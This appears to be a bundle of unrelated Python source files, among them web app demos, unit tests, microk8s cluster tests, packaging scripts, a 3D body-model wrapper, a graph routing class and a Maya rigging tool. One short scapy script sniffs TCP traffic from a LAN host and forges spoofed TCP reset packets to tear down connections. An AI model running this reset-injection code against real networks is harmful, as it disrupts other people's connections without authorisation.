redis_settings = RedisSettings(host=os.getenv('REDIS_HOST', 'localhost'))
async def shutdown(app):
await app['downloader'].close()
def create_app():
app = web.Application()
app.router.add_get('/', index)
app.router.add_post('/start-job/', start_job)
app['downloader'] = Downloader(redis_settings=redis_settings)
app.on_shutdown.append(shutdown)
session_setup(app, SimpleCookieStorage())
return app
class Worker(BaseWorker):
# used by `arq app.py` command
shadows = [Downloader]
# set to small value so we can play with timeouts
timeout_seconds = 10
def __init__(self, *args, **kwargs):
kwargs['redis_settings'] = redis_settings
super().__init__(*args, **kwargs)
if __name__ == '__main__':
# when called directly run the webserver
app = create_app()
web.run_app(app, port=8000)
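# To try the demo locally (assuming Redis is reachable on localhost):
#   python app.py   # starts the aiohttp web app on port 8000
#   arq app.py      # starts the worker (see the Worker class above)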
|
from .fem import DofMap, Q1Element
from .function_space import FunctionSpace
from .mesh import Mesh, ReferenceQuadrilateral
from .plot import plot
from .quadrature import Quadrature
from .assemble import assemble_vector, assemble_matrix, apply_bc
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Copyright 2007 - 2014, Pascal Volk
# See COPYING for distribution information.
"""This is the vmm main script."""
import sys
if __name__ == "__main__":
# replace the script's cwd (/usr/local/sbin) with our module dir
# (the location of the vmm directory) - if it is not in sys.path
# sys.path[0] = '/usr/local/lib/vmm'
# Otherwise just remove /usr/local/sbin from sys.path
sys.path.remove(sys.path[0])
from vmm.cli.main import run
sys.exit(run(sys.argv))
|
"""Test initialization of the url factory classes"""
import unittest
from vizier.api.routes.base import UrlFactory
from vizier.api.routes.base import PROPERTIES_BASEURL, PROPERTIES_APIDOCURL
from vizier.api.routes.task import TaskUrlFactory
class TestUrlFactoryInit(unittest.TestCase):
def test_init_url_factory(self):
"""Test initializing the main url factory."""
urls = UrlFactory(base_url='http://abc.com/////')
self.assertEqual(urls.base_url, 'http://abc.com')
self.assertIsNone(urls.api_doc_url)
urls = UrlFactory(base_url='http://abc.com/////', api_doc_url='ABC')
self.assertEqual(urls.base_url, 'http://abc.com')
self.assertEqual(urls.api_doc_url, 'ABC')
# Override API doc url via properties
urls = UrlFactory(
base_url='http://abc.com/////',
api_doc_url='ABC',
properties={PROPERTIES_APIDOCURL: 'XYZ'}
)
self.assertEqual(urls.base_url, 'http://abc.com')
self.assertEqual(urls.api_doc_url, 'XYZ')
# Override base url via properties
urls = UrlFactory(
base_url='http://abc.com/////',
api_doc_url='ABC',
properties={PROPERTIES_BASEURL: 'XYZ'}
)
self.assertEqual(urls.base_url, 'XYZ')
self.assertEqual(urls.api_doc_url, 'ABC')
# Initialize only via properties
urls = UrlFactory(properties={
PROPERTIES_BASEURL: 'XYZ',
PROPERTIES_APIDOCURL: 'ABC'
})
self.assertEqual(urls.base_url, 'XYZ')
self.assertEqual(urls.api_doc_url, 'ABC')
        # Assertion error if base url is not set
with self.assertRaises(AssertionError):
urls = UrlFactory(
api_doc_url='ABC',
properties={PROPERTIES_APIDOCURL: 'XYZ'}
)
def test_tasks_url_factory(self):
"""Initialize the task url factory."""
fact = TaskUrlFactory(base_url='http://abc.com/////')
self.assertEqual(fact.base_url, 'http://abc.com')
self.assertEqual(fact.set_task_state(task_id='TID'), 'http://abc.com/tasks/TID')
        # Override base url via properties
fact = TaskUrlFactory(
base_url='http://abc.com/////',
properties={PROPERTIES_BASEURL: 'XYZ'}
)
self.assertEqual(fact.base_url, 'XYZ')
        # Value error if no base url is given
with self.assertRaises(ValueError):
TaskUrlFactory()
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
#
# Copyright 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Simple protocol message types.
Includes new message and field types that are outside what is defined by the
protocol buffers standard.
"""
__author__ = 'rafek@google.com (Rafe Kaplan)'
import datetime
from . import messages
from . import util
__all__ = [
'DateTimeField',
'DateTimeMessage',
'VoidMessage',
]
class VoidMessage(messages.Message):
"""Empty message."""
class DateTimeMessage(messages.Message):
"""Message to store/transmit a DateTime.
Fields:
milliseconds: Milliseconds since Jan 1st 1970 local time.
time_zone_offset: Optional time zone offset, in minutes from UTC.
"""
milliseconds = messages.IntegerField(1, required=True)
time_zone_offset = messages.IntegerField(2)
class DateTimeField(messages.MessageField):
"""Field definition for datetime values.
Stores a python datetime object as a field. If time zone information is
included in the datetime object, it will be included in
the encoded data when this is encoded/decoded.
"""
type = datetime.datetime
message_type = DateTimeMessage
@util.positional(3)
def __init__(self,
number,
**kwargs):
super(DateTimeField, self).__init__(self.message_type,
number,
**kwargs)
def value_from_message(self, message):
"""Convert DateTimeMessage to a datetime.
Args:
      message: A DateTimeMessage instance.
Returns:
A datetime instance.
"""
message = super(DateTimeField, self).value_from_message(message)
if message.time_zone_offset is None:
return datetime.datetime.utcfromtimestamp(message.milliseconds / 1000.0)
# Need to subtract the time zone offset, because when we call
# datetime.fromtimestamp, it will add the time zone offset to the
# value we pass.
milliseconds = (message.milliseconds -
60000 * message.time_zone_offset)
timezone = util.TimeZoneOffset(message.time_zone_offset)
return datetime.datetime.fromtimestamp(milliseconds / 1000.0,
tz=timezone)
def value_to_message(self, value):
value = super(DateTimeField, self).value_to_message(value)
# First, determine the delta from the epoch, so we can fill in
# DateTimeMessage's milliseconds field.
if value.tzinfo is None:
time_zone_offset = 0
local_epoch = datetime.datetime.utcfromtimestamp(0)
else:
time_zone_offset = util.total_seconds(value.tzinfo.utcoffset(value))
# Determine Jan 1, 1970 local time.
local_epoch = datetime.datetime.fromtimestamp(-time_zone_offset,
tz=value.tzinfo)
delta = value - local_epoch
# Create and fill in the DateTimeMessage, including time zone if
# one was specified.
message = DateTimeMessage()
message.milliseconds = int(util.total_seconds(delta) * 1000)
if value.tzinfo is not None:
utc_offset = value.tzinfo.utcoffset(value)
if utc_offset is not None:
message.time_zone_offset = int(
util.total_seconds(value.tzinfo.utcoffset(value)) / 60)
return message
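# Round-trip sketch (illustrative, not part of protorpc): encode a timezone-aware
# datetime into a DateTimeMessage and decode it back. The helper name is made up.
def _example_roundtrip():
    field = DateTimeField(1)
    tz = util.TimeZoneOffset(60)  # UTC+01:00, expressed in minutes
    original = datetime.datetime(2010, 1, 1, 12, 0, tzinfo=tz)
    message = field.value_to_message(original)
    # value_from_message() reconstructs the same instant, so this compares equal.
    return field.value_from_message(message) == original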
|
import string
import random
import time
import pytest
import os
import subprocess
from os import path
# Provide a list of VMs you want to reuse. The VMs should already have microk8s installed;
# the test will attempt a refresh to the channel requested for testing.
# reuse_vms = ['vm-ldzcjb', 'vm-nfpgea', 'vm-pkgbtw']
reuse_vms = None
channel_to_test = os.environ.get("CHANNEL_TO_TEST", "edge/ha-preview")
backend = os.environ.get("BACKEND", None)
class VM:
"""
This class abstracts the backend we are using. It could be either multipass or lxc.
"""
def __init__(self, attach_vm=None):
"""Detect the available backends and instantiate a VM.
If `attach_vm` is provided we just make sure the right MicroK8s is deployed.
:param attach_vm: the name of the VM we want to reuse
"""
rnd_letters = "".join(random.choice(string.ascii_lowercase) for i in range(6))
self.backend = "none"
self.vm_name = "vm-{}".format(rnd_letters)
if attach_vm:
self.vm_name = attach_vm
if path.exists("/snap/bin/multipass") or backend == "multipass":
print("Creating mulitpass VM")
self.backend = "multipass"
if not attach_vm:
subprocess.check_call(
"/snap/bin/multipass launch 18.04 -n {} -m 2G".format(self.vm_name).split()
)
subprocess.check_call(
"/snap/bin/multipass exec {} -- sudo "
"snap install microk8s --classic --channel {}".format(
self.vm_name, channel_to_test
).split()
)
else:
subprocess.check_call(
"/snap/bin/multipass exec {} -- sudo "
"snap refresh microk8s --channel {}".format(
self.vm_name, channel_to_test
).split()
)
elif path.exists("/snap/bin/lxc") or backend == "lxc":
self.backend = "lxc"
if not attach_vm:
profiles = subprocess.check_output("/snap/bin/lxc profile list".split())
if "microk8s" not in profiles.decode():
subprocess.check_call("/snap/bin/lxc profile copy default microk8s".split())
with open("lxc/microk8s-zfs.profile", "r+") as fp:
profile_string = fp.read()
process = subprocess.Popen(
"/snap/bin/lxc profile edit microk8s".split(),
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
)
process.stdin.write(profile_string.encode())
process.stdin.close()
subprocess.check_call(
"/snap/bin/lxc launch -p default -p microk8s ubuntu:18.04 {}".format(
self.vm_name
).split()
)
cmd_prefix = "/snap/bin/lxc exec {} -- script -e -c".format(self.vm_name).split()
cmd = ["snap install microk8s --classic --channel {}".format(channel_to_test)]
time.sleep(20)
subprocess.check_output(cmd_prefix + cmd)
else:
cmd = "/snap/bin/lxc exec {} -- ".format(self.vm_name).split()
cmd.append("sudo snap refresh microk8s --channel {}".format(channel_to_test))
subprocess.check_call(cmd)
else:
raise Exception("Need to install multipass of lxc")
def run(self, cmd):
"""
Run a command
:param cmd: the command we are running.
:return: the output of the command
"""
if self.backend == "multipass":
output = subprocess.check_output(
"/snap/bin/multipass exec {} -- sudo " "{}".format(self.vm_name, cmd).split()
)
return output
elif self.backend == "lxc":
cmd_prefix = "/snap/bin/lxc exec {} -- script -e -c ".format(self.vm_name).split()
output = subprocess.check_output(cmd_prefix + [cmd])
return output
else:
raise Exception("Not implemented for backend {}".format(self.backend))
def release(self):
"""
Release a VM.
"""
print("Destroying VM in {}".format(self.backend))
if self.backend == "multipass":
subprocess.check_call("/snap/bin/multipass stop {}".format(self.vm_name).split())
subprocess.check_call("/snap/bin/multipass delete {}".format(self.vm_name).split())
elif self.backend == "lxc":
subprocess.check_call("/snap/bin/lxc stop {}".format(self.vm_name).split())
subprocess.check_call("/snap/bin/lxc delete {}".format(self.vm_name).split())
class TestCluster(object):
@pytest.fixture(autouse=True, scope="module")
def setup_cluster(self):
"""
        Provision VMs and form a cluster.
:return:
"""
try:
print("Setting up cluster")
type(self).VM = []
if not reuse_vms:
size = 3
for i in range(0, size):
print("Creating machine {}".format(i))
vm = VM()
print("Waiting for machine {}".format(i))
vm.run("/snap/bin/microk8s.status --wait-ready --timeout 120")
self.VM.append(vm)
else:
for vm_name in reuse_vms:
self.VM.append(VM(vm_name))
# Form cluster
vm_master = self.VM[0]
connected_nodes = vm_master.run("/snap/bin/microk8s.kubectl get no")
for vm in self.VM:
if vm.vm_name in connected_nodes.decode():
continue
else:
print("Adding machine {} to cluster".format(vm.vm_name))
add_node = vm_master.run("/snap/bin/microk8s.add-node")
endpoint = [ep for ep in add_node.decode().split() if ":25000/" in ep]
vm.run("/snap/bin/microk8s.join {}".format(endpoint[0]))
# Wait for nodes to be ready
print("Waiting for nodes to register")
connected_nodes = vm_master.run("/snap/bin/microk8s.kubectl get no")
while "NotReady" in connected_nodes.decode():
time.sleep(5)
connected_nodes = vm_master.run("/snap/bin/microk8s.kubectl get no")
print(connected_nodes.decode())
# Wait for CNI pods
print("Waiting for cni")
while True:
ready_pods = 0
pods = vm_master.run("/snap/bin/microk8s.kubectl get po -n kube-system -o wide")
for line in pods.decode().splitlines():
if "calico" in line and "Running" in line:
ready_pods += 1
if ready_pods == (len(self.VM) + 1):
print(pods.decode())
break
time.sleep(5)
yield
finally:
print("Cleanup up cluster")
if not reuse_vms:
for vm in self.VM:
print("Releasing machine {} in {}".format(vm.vm_name, vm.backend))
vm.release()
def test_calico_in_nodes(self):
"""
Test each node has a calico pod.
"""
print("Checking calico is in all nodes")
pods = self.VM[0].run("/snap/bin/microk8s.kubectl get po -n kube-system -o wide")
for vm in self.VM:
if vm.vm_name not in pods.decode():
assert False
print("Calico found in node {}".format(vm.vm_name))
def test_nodes_in_ha(self):
"""
Test all nodes are seeing the database while removing nodes
"""
# All nodes see the same pods
for vm in self.VM:
pods = vm.run("/snap/bin/microk8s.kubectl get po -n kube-system -o wide")
for other_vm in self.VM:
if other_vm.vm_name not in pods.decode():
assert False
print("All nodes see the same pods")
        # Wait (with a bounded number of attempts) until every node reports HA enabled.
        attempt = 100
        while True:
            assert attempt > 0
            attempt -= 1
            if all(
                "high-availability: yes" in vm.run("/snap/bin/microk8s.status").decode()
                for vm in self.VM
            ):
                break
            time.sleep(2)
# remove a node
print("Removing machine {}".format(self.VM[0].vm_name))
self.VM[0].run("/snap/bin/microk8s.leave")
self.VM[1].run("/snap/bin/microk8s.remove-node {}".format(self.VM[0].vm_name))
# allow for some time for the leader to hand over leadership
time.sleep(10)
attempt = 100
while True:
ready_pods = 0
pods = self.VM[1].run("/snap/bin/microk8s.kubectl get po -n kube-system -o wide")
for line in pods.decode().splitlines():
if "calico" in line and "Running" in line:
ready_pods += 1
if ready_pods == (len(self.VM)):
print(pods.decode())
break
attempt -= 1
if attempt <= 0:
assert False
time.sleep(5)
print("Checking calico is on the nodes running")
leftVMs = [self.VM[1], self.VM[2]]
        # Wait until the remaining nodes report that HA is no longer enabled.
        attempt = 100
        while True:
            assert attempt > 0
            attempt -= 1
            if all(
                "high-availability: no" in vm.run("/snap/bin/microk8s.status").decode()
                for vm in leftVMs
            ):
                break
            time.sleep(2)
for vm in leftVMs:
pods = vm.run("/snap/bin/microk8s.kubectl get po -n kube-system -o wide")
for other_vm in leftVMs:
if other_vm.vm_name not in pods.decode():
time.sleep(2)
assert False
print("Remaining nodes see the same pods")
print("Waiting for two ingress to appear")
self.VM[1].run("/snap/bin/microk8s.enable ingress")
# wait for two ingress to appear
time.sleep(10)
attempt = 100
while True:
ready_pods = 0
pods = self.VM[1].run("/snap/bin/microk8s.kubectl get po -A -o wide")
for line in pods.decode().splitlines():
if "ingress" in line and "Running" in line:
ready_pods += 1
if ready_pods == (len(self.VM) - 1):
print(pods.decode())
break
attempt -= 1
if attempt <= 0:
assert False
time.sleep(5)
print("Rejoin the node")
add_node = self.VM[1].run("/snap/bin/microk8s.add-node")
endpoint = [ep for ep in add_node.decode().split() if ":25000/" in ep]
self.VM[0].run("/snap/bin/microk8s.join {}".format(endpoint[0]))
print("Waiting for nodes to be ready")
connected_nodes = self.VM[0].run("/snap/bin/microk8s.kubectl get no")
while "NotReady" in connected_nodes.decode():
time.sleep(5)
connected_nodes = self.VM[0].run("/snap/bin/microk8s.kubectl get no")
        # Wait until every node reports that high availability is enabled again.
        attempt = 100
        while True:
            assert attempt > 0
            ha_ready = True
            for vm in self.VM:
                status = vm.run("/snap/bin/microk8s.status")
                if "high-availability: yes" not in status.decode():
                    ha_ready = False
                    break
            if ha_ready:
                break
            attempt -= 1
            time.sleep(2)
|
# Copyright 2009-2017 Ram Rachum.
# This program is distributed under the MIT license.
'''A package for doing a binary search in a sequence.'''
from .roundings import (Rounding, LOW, LOW_IF_BOTH, LOW_OTHERWISE_HIGH, HIGH,
HIGH_IF_BOTH, HIGH_OTHERWISE_LOW, EXACT, CLOSEST,
CLOSEST_IF_BOTH, BOTH)
from .functions import (binary_search, binary_search_by_index,
make_both_data_into_preferred_rounding)
from .binary_search_profile import BinarySearchProfile
|
# -*- coding: utf-8 -*-
"""Packaging logic for beem."""
import codecs
import io
import os
import sys
from setuptools import setup
# Work around mbcs bug in distutils.
# http://bugs.python.org/issue10945
try:
codecs.lookup('mbcs')
except LookupError:
ascii = codecs.lookup('ascii')
codecs.register(lambda name, enc=ascii: {True: enc}.get(name == 'mbcs'))
VERSION = '0.1.2'
tests_require = ['mock >= 2.0.0', 'pytest', 'pytest-mock', 'parameterized']
requires = [
"beem",
"dataset",
"mysqlclient"
]
def write_version_py(filename):
"""Write version."""
cnt = """\"""THIS FILE IS GENERATED FROM beem SETUP.PY.\"""
version = '%(version)s'
"""
with open(filename, 'w') as a:
a.write(cnt % {'version': VERSION})
def get_long_description():
"""Generate a long description from the README file."""
descr = []
for fname in ('README.md',):
with io.open(fname, encoding='utf-8') as f:
descr.append(f.read())
return '\n\n'.join(descr)
if __name__ == '__main__':
    # Rewrite the version file every time
write_version_py('steembi/version.py')
setup(
name='steembi',
version=VERSION,
description='Steem basic income library',
long_description=get_long_description(),
download_url='https://github.com/holgern/steembasicincome/tarball/' + VERSION,
author='Holger Nahrstaedt',
author_email='holger@nahrstaedt.de',
maintainer='Holger Nahrstaedt',
maintainer_email='holger@nahrstaedt.de',
url='http://www.github.com/holgern/steembasicincome',
keywords=['steem', 'library', 'ubi', 'steembasicincome'],
packages=[
"steembi"
],
classifiers=[
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Office/Business :: Financial',
],
install_requires=requires,
entry_points={
},
setup_requires=['pytest-runner'],
tests_require=tests_require,
include_package_data=True,
)
|
import logging
from email.utils import parseaddr
logger = logging.getLogger('c7n_mailer.utils.email')
def is_email(target):
if target.startswith('slack://'):
logger.debug("Slack payload, not an email.")
return False
if parseaddr(target)[1] and '@' in target and '.' in target:
return True
else:
return False
|
import torch
import numpy as np
import smplx
from smplx import SMPL as _SMPL
from smplx.body_models import ModelOutput
from smplx.lbs import vertices2joints
import spin.config as config
import spin.constants as constants
class SMPL(_SMPL):
""" Extension of the official SMPL implementation to support more joints """
def __init__(self, *args, **kwargs):
super(SMPL, self).__init__(*args, **kwargs)
joints = [constants.JOINT_MAP[i] for i in constants.JOINT_NAMES]
J_regressor_extra = np.load(config.JOINT_REGRESSOR_TRAIN_EXTRA)
self.register_buffer('J_regressor_extra', torch.tensor(J_regressor_extra, dtype=torch.float32))
self.joint_map = torch.tensor(joints, dtype=torch.long)
def forward(self, *args, **kwargs):
kwargs['get_skin'] = True
smpl_output = super(SMPL, self).forward(*args, **kwargs)
extra_joints = vertices2joints(self.J_regressor_extra, smpl_output.vertices)
joints = torch.cat([smpl_output.joints, extra_joints], dim=1)
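        # NOTE: the next line discards the concatenated extra joints and keeps
        # only the stock SMPL joints; drop it (and restore the joint_map
        # indexing below) to return the extended joint set this class adds.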
joints = smpl_output.joints
# print(smpl_output.joints.shape)
# joints = joints[:, self.joint_map, :]
output = ModelOutput(vertices=smpl_output.vertices,
global_orient=smpl_output.global_orient,
body_pose=smpl_output.body_pose,
joints=joints,
betas=smpl_output.betas,
full_pose=smpl_output.full_pose)
return output
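
# A minimal usage sketch, not part of the original module. It assumes
# config.SMPL_MODEL_DIR points at the downloaded SMPL model files and uses
# smplx's axis-angle inputs (3 values for global_orient, 69 for body_pose,
# 10 shape coefficients); adjust the path and batch size to your setup.
if __name__ == '__main__':
    smpl = SMPL(config.SMPL_MODEL_DIR, batch_size=1, create_transl=False)
    betas = torch.zeros(1, 10)          # neutral shape
    body_pose = torch.zeros(1, 69)      # zero body pose
    global_orient = torch.zeros(1, 3)   # no global rotation
    output = smpl(betas=betas, body_pose=body_pose, global_orient=global_orient)
    print(output.vertices.shape, output.joints.shape)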
|
from scapy.all import *
from scapy.all import send
from scapy.layers.inet import *
srcIP = "192.168.0.103"
destIP = "192.168.0.108"
def spoof_tcp(pkt):
IPLayer = IP(dst=destIP, src=pkt[IP].dst)
TCPLayer = TCP(flags="R", seq=pkt[TCP].ack, dport=pkt[TCP].sport, sport=pkt[TCP].dport)
spoofpkt = IPLayer/TCPLayer
send(spoofpkt, verbose=1)
print("Spoofed Packet Sent...")
while True:
pkt = sniff(filter="tcp and src host " + destIP)
print("Found Packet")
print(pkt)
# spoof_tcp(pkt)
|
#Attempt to route using the Joswig Algorithm described here: https://arxiv.org/pdf/1904.01082.pdf
#using object oriented programming.
class Vertex:
num_vert = 0
vertices = []
def __init__(self, lab=""):
self.label = lab
self.adj = [] #adjacency list
self.weight = [] #weights associated to adjacency list edges
self.known = False #shortest path to self is known
self.pv = None #previous node in shortest path tree
self.dv = 0 #current distance on best known path
self.help = False #helper boolean denoting if a vertex has had dv changed from 0.
Vertex.num_vert += 1
Vertex.vertices.append(self)
#links self to vert with weight cost
def link(self,vert,cost):
if((vert in self.adj) == False):
self.adj.append(vert)
self.weight.append(cost)
def editlink(self,vert,cost):
if((vert in self.adj) == True):
self.weight[self.adj.index(vert)] = cost
def clear(self):
Vertex.num_vert = 0
Vertex.vertices = []
def printadj(self,lab):
for v in self.adj:
result = v.label,v.dv
if(lab == True):
result = v.label,v.pv.label,v.dv
print(result)
    #reset vertex boolean values
    #must be called before computing a new shortest-path tree
def vert_false(self):
for v in Vertex.vertices:
v.known = False
v.dv = 0
v.pv = None
v.help = False
def shortestpath(self):
num_edge = 0
if(self.adj != []):
num_edge = len(self.adj)
self.known = True
if(num_edge > 0):
for i in range(0,num_edge):
weight = self.weight[i]
if(weight == -1):
weight = 0
if((self.adj[i].help == False) | (self.adj[i].dv > weight + self.dv)):
self.adj[i].dv = weight + self.dv
self.adj[i].pv = self
self.adj[i].help = True
min = -1
next = None
done = True
for v in Vertex.vertices:
if(v.known == False):
done = False
if(v.help == True):
if((min == -1) | (min > v.dv)):
min = v.dv
next = v
if(done == False):
if(next != None):
next.shortestpath()
class Tree:
num_trees = 0
trees = []
def __init__(self,numvert):
self.vertices = []
for i in range(0,numvert):
self.vertices.append(Vertex("v"+str(i+1)))
Tree.num_trees += 1
Tree.trees.append(self)
def link(self,init,final,weight):
numvert = len(self.vertices)
init = init-1
final = final-1
if((init < numvert) & (final < numvert)):
self.vertices[init].link(self.vertices[final],weight)
def editlink(self,init,final,newweight):
numvert = len(self.vertices)
init = init - 1
final = final - 1
if ((init < numvert) & (final < numvert)):
self.vertices[init].editlink(self.vertices[final],newweight)
def shortestpath(self,vert):
self.vertices[vert-1].shortestpath()
result = []
for x in self.vertices[vert-1].adj:
result.append([x.label,x.pv.label,x.dv])
return result
def add_vertex(self,vert):
self.vertices.append(vert)
def vert_false(self):
self.vertices[0].vert_false()
def printadj(self,vert,lab):
self.vertices[vert-1].printadj(lab)
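
# A minimal usage sketch, not part of the original file: build a small weighted
# graph with the Tree/Vertex classes above and query shortest paths from v1.
# Vertex indices passed to link()/shortestpath() are 1-based, as defined above.
if __name__ == "__main__":
    t = Tree(3)               # creates vertices v1, v2, v3
    t.link(1, 2, 4)           # edge v1 -> v2 with weight 4
    t.link(1, 3, 1)           # edge v1 -> v3 with weight 1
    t.link(3, 2, 2)           # edge v3 -> v2 with weight 2
    t.vert_false()            # reset bookkeeping before computing paths
    # Each entry is [vertex, previous vertex on the path, distance from v1],
    # e.g. v2 is reached through v3 at total cost 3.
    print(t.shortestpath(1))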
|
'''
I N S T A L L A T I O N::
Step 1:
Copy "no_flip_pole_vector_tool.py" to your Maya plugins directory.
Windows: C:\Users\UserName\Documents\maya\scripts
Step 2:
Run this in the Maya's Script Editor under the Python tab...
import no_flip_pole_vector_tool as nfpv
nfpv.No_Flip_Pole_Vector().show_ui()
If you have any problems email me at Nicholas.Silveira@gmail.com
'''
import sys
import functools
import maya.cmds as cmds
import maya.OpenMaya as OpenMaya
VERSION = 1.0
'''
========================================================================
----> No Flip Pole Vector <----
========================================================================
'''
class No_Flip_Pole_Vector():
"""
*Examples:* ::
import no_flip_pole_vector_tool as nfpv
# Show ui
nfpv.No_Flip_Pole_Vector().show_ui()
*Author:*
* nicholas.silveira, Nicholas.Silveira@gmail.com, Jun 13, 2013 8:53:53 AM
"""
'''
========================================================================
----> Shows No Flip Pole Vector ui <----
========================================================================
'''
def show_ui( self ):
"""
*Examples:* ::
import no_flip_pole_vector_tool as nfpv
# Show ui
nfpv.No_Flip_Pole_Vector().show_ui()
"""
if cmds.window( 'no_flip_pole_vector_window', exists = True, q = True ):
cmds.deleteUI( 'no_flip_pole_vector_window' )
self.no_flip_pole_vector_ui()
'''
========================================================================
----> No Flip Pole Vector ui <----
========================================================================
'''
def no_flip_pole_vector_ui( self ):
self.root_joint = None
self.controller = None
self.pole_vector = None
window = cmds.window( 'no_flip_pole_vector_window', title = 'No Flip Pole Vector {0}'.format( VERSION ), menuBar = True )
cmds.menu( label = 'Help' )
        cmds.menuItem( 'sample', label = 'Build Sample', c = self.sample )
        cmds.menuItem( 'code_sample', label = 'Code Sample', c = self.code_sample )
        cmds.menuItem( 'about', label = 'About No Flip Pole Vector', c = self.about )
cmds.columnLayout()
cmds.rowColumnLayout ( nc = 2, columnWidth = [( 1, 100 ), ( 2, 200 )] )
cmds.text( label = 'Name: ', align = 'right' )
self.name_text = cmds.textField()
cmds.setParent( '..' )
cmds.rowColumnLayout ( nc = 1, columnWidth = ( 1, 300 ) )
cmds.separator( height = 20, style = 'in' )
cmds.rowColumnLayout ( nc = 2, columnWidth = [( 1, 100 ), ( 2, 200 )] )
cmds.button( label = 'Root Joint', c = functools.partial( self.set_text_field, 'root_joint' ) )
self.root_joint_text = cmds.textField()
cmds.button( label = 'Controller', c = functools.partial( self.set_text_field, 'controller' ) )
self.controller_text = cmds.textField()
cmds.button( label = 'Pole Vector', c = functools.partial( self.set_text_field, 'pole_vector' ) )
self.pole_vector_text = cmds.textField()
cmds.setParent( '..' )
cmds.rowColumnLayout ( nc = 1, columnWidth = ( 1, 300 ) )
cmds.separator( height = 20, style = 'in' )
cmds.button( label = 'Build No Flip Pole Vector', c = self.run_setup )
cmds.showWindow( window )
'''
========================================================================
----> Set Maya ui text field <----
========================================================================
'''
def set_text_field( self, text_field_name, *args ):
"""
*Arguments:*
* ``text_field_name`` Pass a text field name that will take on the selected objects name.
*Examples:* ::
import pymel.core
import no_flip_pole_vector_tool as nfpv
reload( nfpv )
# Show ui
        no_flip_pole_vector = nfpv.No_Flip_Pole_Vector()
        no_flip_pole_vector.show_ui()
# Create locator
cmds.spaceLocator()
# Add selected to text field
no_flip_pole_vector.set_text_field('controller')
"""
objs = cmds.ls( sl = True )
if len( objs ) == 1:
obj_name = objs[0].split( '|' )[-1]
obj_dag = DAG_Node( cmds.ls( sl = True )[0] )
if text_field_name == 'root_joint':
self.root_joint = obj_dag
cmds.textField( self.root_joint_text, edit = True, text = obj_name )
elif text_field_name == 'controller':
self.controller = obj_dag
cmds.textField( self.controller_text, edit = True, text = obj_name )
elif text_field_name == 'pole_vector':
self.pole_vector = obj_dag
cmds.textField( self.pole_vector_text, edit = True, text = obj_name )
        elif len( objs ) > 1:
            OpenMaya.MGlobal.displayError( "There are too many objects selected!" )
        else:
            OpenMaya.MGlobal.displayError( "There are no objects selected!" )
'''
========================================================================
----> Run Setup gets ui data and runs build <----
========================================================================
'''
def run_setup( self, *args ):
self.name = cmds.textField( self.name_text, text = True, q = True )
if self.root_joint:
self.root_joint = self.root_joint.name()
if self.controller:
self.controller = self.controller.name()
if self.pole_vector:
self.pole_vector = self.pole_vector.name()
self.build( root_joint = self.root_joint,
controller = self.controller,
pole_vector = self.pole_vector,
name = self.name )
'''
========================================================================
----> Builds No Flip Pole Vector <----
========================================================================
'''
def build( self, root_joint = None, controller = None, pole_vector = None, name = '', *args ):
"""
*Keyword Arguments:*
* ``root_joint`` Pass the top of the joint chain.
* ``controller`` Pass the main controller.
* ``pole_vector`` Pass the pole vector controller.
* ``name`` Add prefix to all created nodes
*Returns:*
* ``True`` If process finishes.
*Examples:* ::
import pymel.core
import no_flip_pole_vector_tool as nfpv
reload( nfpv )
# Build example rig
# Build joint chain
cmds.select( cl = True )
chain1_jnt = cmds.joint( n = 'chain1_jnt', p = [0, 6, 0] )
chain2_jnt = cmds.joint( n = 'chain2_jnt', p = [0, 3, 1] )
chain3_jnt = cmds.joint( n = 'chain3_jnt', p = [0, 0, 0] )
# Build ikHandle
        chain_ikHandle = cmds.ikHandle ( n = 'chain_ikHandle', startJoint = chain1_jnt, endEffector = chain3_jnt, sol = 'ikRPsolver' )[0]
        # Build pole vector
        pole_vector_loc = cmds.spaceLocator( n = 'pole_vector_loc' )[0]
        cmds.setAttr( '{0}.translateY'.format( pole_vector_loc ), 3 )
        cmds.setAttr( '{0}.translateZ'.format( pole_vector_loc ), 2 )
cmds.poleVectorConstraint( pole_vector_loc, chain_ikHandle )
# Build controller
controller = cmds.circle ( nr = [0, 1, 0], r = 1 )[0]
cmds.pointConstraint( controller, chain_ikHandle )
# Standalone code
nfpv.No_Flip_Pole_Vector().build( root_joint = chain1_jnt, controller = controller, pole_vector = pole_vector_loc, name = 'example' )
"""
        if root_joint is None or controller is None or pole_vector is None:
get_selected_objs = cmds.ls( sl = True )
if len( get_selected_objs ) == 3:
root_joint = DAG_Node( get_selected_objs[0] )
controller = DAG_Node( get_selected_objs[1] )
pole_vector = DAG_Node( get_selected_objs[2] )
            elif len( get_selected_objs ) > 3:
                OpenMaya.MGlobal.displayError( "There are more than 3 objects selected!" )
                return False
            else:
                OpenMaya.MGlobal.displayError( "There are fewer than 3 objects selected!" )
                return False
else:
root_joint = DAG_Node( root_joint )
controller = DAG_Node( controller )
pole_vector = DAG_Node( pole_vector )
cmds.select( cl = True )
# Get pole vector parent
pole_parent = pole_vector.parent()
# Create pole main grp
self.pole_main_grp = DAG_Node( cmds.group( n = '{0}_poleMain_grp'.format( name ), em = True ) )
# Create pole parent grp
pole_parent_grp = DAG_Node( cmds.group( n = '{0}_poleParent_grp'.format( name ), em = True ) )
if pole_parent:
pole_parent_grp.set_parent( pole_parent )
controller_pivot = cmds.xform( controller.name(), ws = True, rp = True, q = True )
controller_rotation = cmds.xform( controller.name(), ws = True, rotation = True, q = True )
cmds.xform( pole_parent_grp.name(), translation = controller_pivot, ws = True )
cmds.xform( pole_parent_grp.name(), rotation = controller_rotation, ws = True )
pole_vector.set_parent( pole_parent_grp )
# Create pole world grp
pole_world_grp = DAG_Node( cmds.group( n = '{0}_poleWorld_grp'.format( name ), em = True ) )
pole_world_grp.set_parent( self.pole_main_grp )
